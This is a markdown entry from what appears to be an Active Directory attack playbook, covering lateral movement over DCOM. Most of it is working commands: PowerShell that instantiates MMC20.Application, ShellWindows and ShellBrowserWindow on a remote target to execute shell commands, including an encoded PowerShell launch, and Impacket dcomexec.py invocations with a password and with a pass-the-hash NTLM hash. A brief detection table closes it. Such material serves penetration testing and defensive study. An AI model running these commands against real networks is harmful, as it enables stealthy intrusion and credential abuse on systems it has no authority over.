attack-57-dcom-lateral-movement.md (3224B)
1 --- 2 title: "Attack #57 — DCOM Lateral Movement" 3 description: "DCOM (Distributed Component Object Model) allows code execution on remote systems by instantiating COM objects. The MMC20.Application, ShellWindows, and…" 4 category: active-directory 5 subcategory: "Lateral Movement" 6 tags: ["active-directory", "lateral-movement"] 7 tools: ["Impacket", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Seven/⚫ Attack #57 — DCOM Lateral Movement.md" 11 --- 12 # ⚫ Attack #57 — DCOM Lateral Movement 13 14 *** 15 16 ## 📖 How It Works 17 18 DCOM (Distributed Component Object Model) allows code execution on remote systems by instantiating COM objects. The `MMC20.Application`, `ShellWindows`, and `ShellBrowserWindow` objects can be abused to execute commands remotely without creating services or writing files — making it stealthier than PsExec. 19 20 *** 21 22 ## ⚙️ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **Local admin on target** | Required for DCOM activation | 27 | **DCOM enabled** | Default enabled, port 135 + dynamic RPC | 28 29 *** 30 31 ## 💻 Full Commands 32 33 ```powershell 34 # ── MMC20.Application ───────────────────────────────────────────────────────── 35 $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","TARGET")) 36 $com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c whoami > C:\Temp\out.txt","Minimized") 37 38 # ── ShellWindows ────────────────────────────────────────────────────────────── 39 $com = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39","TARGET")) 40 $com.Item().Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\Windows\System32",$null,0) 41 42 # ── ShellBrowserWindow ──────────────────────────────────────────────────────── 43 $com = [activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","TARGET")) 44 $com.Document.Application.ShellExecute("cmd.exe","/c powershell -e <base64>","C:\Windows",$null,0) 45 ``` 46 47 ```bash 48 # ── Impacket — dcomexec.py ──────────────────────────────────────────────────── 49 dcomexec.py corp.local/Administrator:'Password1'@10.10.10.10 50 51 # ── With PtH ────────────────────────────────────────────────────────────────── 52 dcomexec.py corp.local/Administrator@10.10.10.10 -hashes :2b576acbe6bcfda7294d6bd18041b8fe 53 ``` 54 55 *** 56 57 ## 🛡️ Detection — Event IDs 58 59 | Event ID | Source | What to Look For | 60 |---|---|---| 61 | **4624** | Security Log | Logon Type 3 via DCOM | 62 | **4688** | Security Log | Process creation from mmc.exe or explorer.exe (DCOM host) | 63 64 *** 65 66 > ✅ **Attack #57 — DCOM Lateral Movement complete.**